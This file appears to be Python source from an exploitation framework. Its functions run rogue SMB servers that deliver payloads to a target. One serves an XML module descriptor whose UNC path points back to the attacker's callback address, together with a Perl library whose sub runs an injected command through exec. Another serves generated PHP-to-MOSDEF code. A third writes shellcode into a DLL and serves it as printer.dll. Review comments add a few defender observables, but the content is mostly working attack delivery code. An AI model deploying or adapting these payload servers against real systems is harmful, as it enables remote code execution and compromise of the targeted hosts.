def setupSMBServer(self):
    """
    Run a short-lived SMB listener that serves one in-memory file.

    The listener binds all local interfaces on TCP 445 and is loaded with
    ``self.filedata`` under the name ``self.filename``. ``self.host`` is
    recorded as the expected peer. Once listening, ``self.smbinit`` is set
    to 1 under ``self.smblock``. The method then waits for a client, services
    it until the handler stops or the module is halted, logs termination,
    sleeps ten seconds and returns None.
    """
    import smbserver

    self.log("Starting SMBServer")
    server = smbserver.SMBServer("0.0.0.0", 445)

    # Two minutes divided by the number of tries, plus slack, so that the
    # listener stays up for two minutes at least.
    # NOTE(review): presumably the timeout applies to each accept() call;
    # confirm in smbserver.
    server.timeout = 120 / 4 + 10

    # Intended to make sure only the target can connect. The enforcement
    # lives in smbserver and is not visible here. The bind address above is
    # still every interface, so the port is reachable network-wide.
    server.target = self.host

    # Load the file data that will be offered to the client.
    server.set_file_data(self.filename, self.filedata)

    if server.listen() == 0:
        self.log("Could not listen!")
        return

    self.log("Accepting connections")
    attempt = 0

    # Publish "listener is ready" under the lock.
    self.smblock.acquire()
    self.smbinit = 1
    self.smblock.release()

    # accept() returning 0 is treated as "no client yet".
    while True:
        if server.accept() != 0:
            break
        self.log("Waiting for new client... (Try: %d/3)" % (attempt))
        attempt += 1
        if attempt > 3 or self.ISucceeded():
            break

    # Service the connection once per second until the handler reports it is
    # done or the module has been told to halt.
    while server.handle():
        if self.state == self.HALT:
            break
        time.sleep(1)

    self.log("Terminating SMBServer")
    time.sleep(10)
def run(self):
    """
    Serve a generated module descriptor and Perl library over SMB.

    The listener binds the callback address on TCP 445 and records
    ``self.exploit.host`` as the expected peer. Two in-memory files are
    published: an XML descriptor whose module name is a UNC path pointing
    back at the callback address, and a Perl package whose ``go`` sub runs
    ``self.cmd``. After signalling readiness through ``smbinit`` the method
    waits for a client, services it, closes the listening socket and
    returns None.

    NOTE(review): from a defender's view the observable is the target
    opening an outbound SMB session (TCP 445) to fetch module files from a
    UNC path. Egress filtering of SMB would presumably prevent the fetch;
    confirm against the affected product.
    """
    exploit = self.exploit

    def still_wanted():
        # False once the module is halted or this thread was asked to stop.
        return exploit.state != exploit.HALT and self.suicide == False

    exploit.log("Starting SMB server")
    server = smbserver.SMBServer(exploit.callback.ip, 445)
    server.timeout = 30
    server.target = exploit.host

    # Set module.xml file
    descriptor = "".join([
        "<UniFi>\n",
        " <Module name=\"\\\\\\\\?\\\\UNC\\\\",
        exploit.callback.ip,
        "\\\\tmp\\\\d2\" priority=\"1\">\n",
        " <Library type=\"perl\" lib=\"d2\">\n",
        " <Method name=\"go\" svc=\"d2::go\" peer=\"inquire\"/>\n",
        " </Library>\n",
        " </Module>\n",
        "</UniFi>",
    ])
    server.set_file_data("d2\\module.xml", descriptor)

    # Set library file. self.cmd is placed verbatim between double quotes
    # in the generated Perl source; nothing here escapes it.
    library = "".join([
        "package d2;\n\n",
        "use 5.008003;\n",
        "use strict;\n",
        "use warnings;\n\n\n",
        "sub go { \n",
        " exec(\"",
        self.cmd,
        "\");\n",
        " return 0;\n",
        "}\n\n",
        "1;\n",
        "__END__",
    ])
    server.set_file_data("d2\\lib\\d2.pm", library)

    if server.listen() == 0:
        exploit.log("Could not listen!")
        return

    exploit.log("SMB server accepting connections")
    attempt = 0

    # Publish "listener is ready" under the lock.
    exploit.smblock.acquire()
    exploit.smbinit = 1
    exploit.smblock.release()

    # accept() returning 0 is treated as "no client yet".
    while server.accept() == 0 and still_wanted():
        exploit.log("Waiting for new client... (Try: %d/4)" % (attempt))
        attempt += 1
        if attempt > 4:
            break

    # Service the connection once per second until it ends or we are stopped.
    while server.handle() and still_wanted():
        time.sleep(1)

    server.s.close()
    exploit.log("Terminating SMB server")
def set_up_smb_server(self):
    """
    Create and start an SMB listener that serves one generated file.

    The listener binds all local interfaces on TCP 445 with a five-second
    timeout. It is loaded with the output of ``self.get_php_to_mosdef()``
    under the name ``self.phpfilename``. On success the server object is
    kept in ``self.server`` for the caller to drive.

    NOTE(review): no ``target`` is assigned to the server in this function,
    so nothing here limits which peer may connect.

    Returns:
        True when the listener is up, False when listen() reports failure.
    """
    self.log("Starting smb server")
    listener = smbserver.SMBServer("0.0.0.0", 445)

    # Load the file data up.
    served_name = self.phpfilename
    served_body = self.get_php_to_mosdef()
    listener.set_file_data(served_name, served_body)
    listener.timeout = 5

    if listener.listen() == 0:
        self.log("Could not listen!")
        return False

    self.server = listener
    self.log("Accepting connections via SMB for files")
    return True
def run(self):
    """
    Serve a patched DLL over SMB under the name ``printer.dll``.

    The file at ``self.dllpath`` is read and searched for the marker
    ``c00kie``. The bytes starting at the marker are overwritten in place
    with ``self.exploit.shellcode``, so the overall length is unchanged.
    The method gives up, after logging, when the marker is missing, when
    the shellcode is longer than 0x1000 bytes, or when anything in the
    read/patch step raises. Otherwise it listens on all interfaces on
    TCP 445, signals readiness through ``smbinit``, waits for a client,
    services it and returns None.

    NOTE(review): from a defender's view the observable is presumably an
    SMB read of ``printer.dll`` from a host that is not a known print
    server; confirm against the affected component.
    """
    exploit = self.exploit

    def still_wanted():
        # False once the module is halted or this thread was asked to stop.
        return exploit.state != exploit.HALT and self.suicide == False

    exploit.log('Starting SMB server')
    server = smbserver.SMBServer('0.0.0.0', 445)
    server.timeout = 30
    server.target = exploit.host

    # NOTE(review): the bare except below reports every failure in this
    # step, not only a missing or unreadable file, with the same message.
    # The file is also opened without a mode argument, i.e. in text mode.
    try:
        handle = open(self.dllpath)
        image = handle.read()
        handle.close()

        marker_at = image.find('c00kie')
        if marker_at < 0 or len(exploit.shellcode) > 0x1000:
            exploit.log("Cookie in the DLL couldn't be found or Shellcode too long. Aborting.")
            return

        exploit.log('Injecting shellcode in the DLL')
        payload = exploit.shellcode
        # Same-length overwrite: keep everything before the marker, then the
        # payload, then the original bytes after the overwritten region.
        head = image[:marker_at]
        tail = image[marker_at + len(payload):]
        image = head + payload + tail
    except:
        exploit.log('Connect back binary couldn\'t be found/read!')
        return

    server.set_file_data('printer.dll', image)

    if server.listen() == 0:
        exploit.log('Could not listen!')
        return

    exploit.log('SMB server accepting connections')
    attempt = 0

    # Publish "listener is ready" under the lock.
    exploit.smblock.acquire()
    exploit.smbinit = 1
    exploit.smblock.release()

    # accept() returning 0 is treated as "no client yet".
    while server.accept() == 0 and still_wanted():
        exploit.log('Waiting for new client... (Try: %d/4)' % (attempt))
        attempt += 1
        if attempt > 4 or exploit.ISucceeded():
            break

    # Service the connection once per second until it ends or we are stopped.
    while server.handle() and still_wanted():
        time.sleep(1)

    exploit.log('Terminating SMB server')